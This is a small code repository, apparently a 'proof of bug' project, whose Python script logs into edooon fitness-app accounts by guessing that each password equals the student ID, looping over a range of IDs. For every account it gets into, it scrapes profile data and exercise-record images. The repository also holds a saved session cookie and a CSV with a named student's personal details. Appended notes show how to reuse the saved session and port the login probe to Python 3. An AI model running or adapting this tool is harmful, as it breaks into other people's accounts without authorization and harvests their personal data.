├── userInfoFile.txt
├── cookie.txt
├── README.md
├── .gitignore
└── edooonClawer.py

/userInfoFile.txt:
--------------------------------------------------------------------------------
姓名,性别,专业,学年,类别,学号,
姓名,性别,专业,学年,类别,学号,
滕文瑛,女,信息科学技术学院,2011级,本科生,1100012970,
--------------------------------------------------------------------------------
/cookie.txt:
--------------------------------------------------------------------------------
# Netscape HTTP Cookie File
# http://curl.haxx.se/rfc/cookie_spec.html
# This is a generated file! Do not edit.

b.edooon.com	FALSE	/	FALSE	JSESSIONID	40F066A099B56B3ED73900AD6894D161
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
# edoonCrawler
This crawler attempts to retrieve all user information from [edooon](https://edooon.com/), a lame exercise-tracking app.

# Disclaimer
The author found a 'bug' in the app and wrote this crawler to prove the point. No actual attack was ever launched, and the author disclaims any responsibility for any consequences related to this work.
--------------------------------------------------------------------------------
/.gitignore:
--------------------------------------------------------------------------------
# Byte-compiled / optimized / DLL files
__pycache__/
*.py[cod]
*$py.class

# C extensions
*.so

# Distribution / packaging
.Python
env/
build/
develop-eggs/
dist/
downloads/
eggs/
.eggs/
lib/
lib64/
parts/
sdist/
var/
*.egg-info/
.installed.cfg
*.egg

# PyInstaller
# Usually these files are written by a python script from a template
# before PyInstaller builds the exe, so as to inject date/other infos into it.
*.manifest
*.spec

# Installer logs
pip-log.txt
pip-delete-this-directory.txt

# Unit test / coverage reports
htmlcov/
.tox/
.coverage
.coverage.*
.cache
nosetests.xml
coverage.xml
*,cover
.hypothesis/

# Translations
*.mo
*.pot

# Django stuff:
*.log
local_settings.py

# Flask stuff:
instance/
.webassets-cache

# Scrapy stuff:
.scrapy

# Sphinx documentation
docs/_build/

# PyBuilder
target/

# IPython Notebook
.ipynb_checkpoints

# pyenv
.python-version

# celery beat schedule file
celerybeat-schedule

# dotenv
.env

# virtualenv
venv/
ENV/

# Spyder project settings
.spyderproject

# Rope project settings
.ropeproject
--------------------------------------------------------------------------------
/edooonClawer.py:
--------------------------------------------------------------------------------
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Python 2 script. Probes edooon accounts whose password equals the
# student ID, then scrapes the profile fields and record images.

import os
import urllib
import urllib2
import urlparse
import cookielib
from urllib import urlretrieve
from bs4 import BeautifulSoup

# Output CSV; the header columns are: name, gender, department,
# year, category, student ID.
userInfoFile = open("userInfoFile.txt", "a")
userInfoFile.write("姓名,性别,专业,学年,类别,学号,\n")

def userLogin(user_id):
    # A MozillaCookieJar instance holds the session cookie; it can be
    # written out to cookie.txt in Netscape format later.
    cookie = cookielib.MozillaCookieJar('cookie.txt')
    opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cookie))
    # The guessed credentials: username and password are both the student ID.
    postdata = urllib.urlencode({
        'uname': user_id,
        'passwd': user_id
    })
    # Login URL of the system
    loginUrl = 'http://b.edooon.com/login'
    loginHeader = {
        "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36"
    }
    # Simulate the login; the opener captures the session cookie.
    request = urllib2.Request(loginUrl, postdata, loginHeader)
    result = opener.open(request)
    #cookie.save(ignore_discard=True, ignore_expires=True)  # dump the cookie to cookie.txt
    soup = BeautifulSoup(result.read(), 'html.parser')
    # On a successful login the page shows the profile fields in span.userNav.
    userNavList = soup.select('span[class="userNav"]')
    if userNavList:
        for userNav in userNavList:
            userInfoFile.write(userNav.get_text().encode('utf-8') + ',')
        userInfoFile.write('\n')
        # Download the exercise-record images linked from the page.
        out_folder = './'
        imgName = user_id + '_'
        tmpCnt = 0
        imgUrl = 'http://b.edooon.com/'
        for image in soup.findAll("img"):
            image_url = urlparse.urljoin(imgUrl, image['src'])
            outpath = os.path.join(out_folder, imgName + str(tmpCnt))
            if image["src"].startswith('/recordpic'):
                urlretrieve(image_url, outpath)
                tmpCnt += 1

def tryAccount(id_start, id_end):
    for i in range(id_start, id_end):
        print 'Trying: ' + str(i)
        userLogin(str(i))

if __name__ == "__main__":
    ID_START = 1100012968  # first student ID to try
    ID_END = 1100012971    # last student ID (exclusive)
    tryAccount(ID_START, ID_END)
    userInfoFile.close()
--------------------------------------------------------------------------------
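Note: the commented-out cookie.save(...) call inside userLogin is what produces the Netscape-format cookie.txt shown above. A minimal sketch, using the same Python 2 stdlib modules the script already imports and the base URL from this repo, of reloading that file so a later run can reuse the saved JSESSIONID:

```python
import urllib2
import cookielib

# Load the previously saved Netscape-format cookie file. The
# ignore_discard/ignore_expires flags mirror the ones used when
# saving, so session cookies such as JSESSIONID are kept.
cookie = cookielib.MozillaCookieJar('cookie.txt')
cookie.load(ignore_discard=True, ignore_expires=True)

# Attach the jar to an opener; requests to b.edooon.com now carry
# the saved JSESSIONID and reuse the authenticated session.
opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cookie))
page = opener.open('http://b.edooon.com/')
print page.read()[:200]
```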
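urllib2, cookielib, and urlparse exist only in Python 2. A hedged Python 3 sketch of the same login probe, assuming the endpoint still accepts the same uname/passwd form fields and that span.userNav still marks a logged-in profile page:

```python
#!/usr/bin/env python3
import urllib.parse
import urllib.request
import http.cookiejar
from bs4 import BeautifulSoup

def user_login(user_id):
    # Same credential guess as edooonClawer.py: password == student ID.
    jar = http.cookiejar.MozillaCookieJar('cookie.txt')
    opener = urllib.request.build_opener(urllib.request.HTTPCookieProcessor(jar))
    postdata = urllib.parse.urlencode({'uname': user_id, 'passwd': user_id}).encode('utf-8')
    request = urllib.request.Request('http://b.edooon.com/login', postdata,
                                     {'User-Agent': 'Mozilla/5.0'})
    result = opener.open(request)
    soup = BeautifulSoup(result.read(), 'html.parser')
    # A non-empty selection means the guessed credentials worked.
    return [span.get_text() for span in soup.select('span.userNav')]

if __name__ == '__main__':
    for sid in range(1100012968, 1100012971):
        print('Trying:', sid, user_login(str(sid)))
```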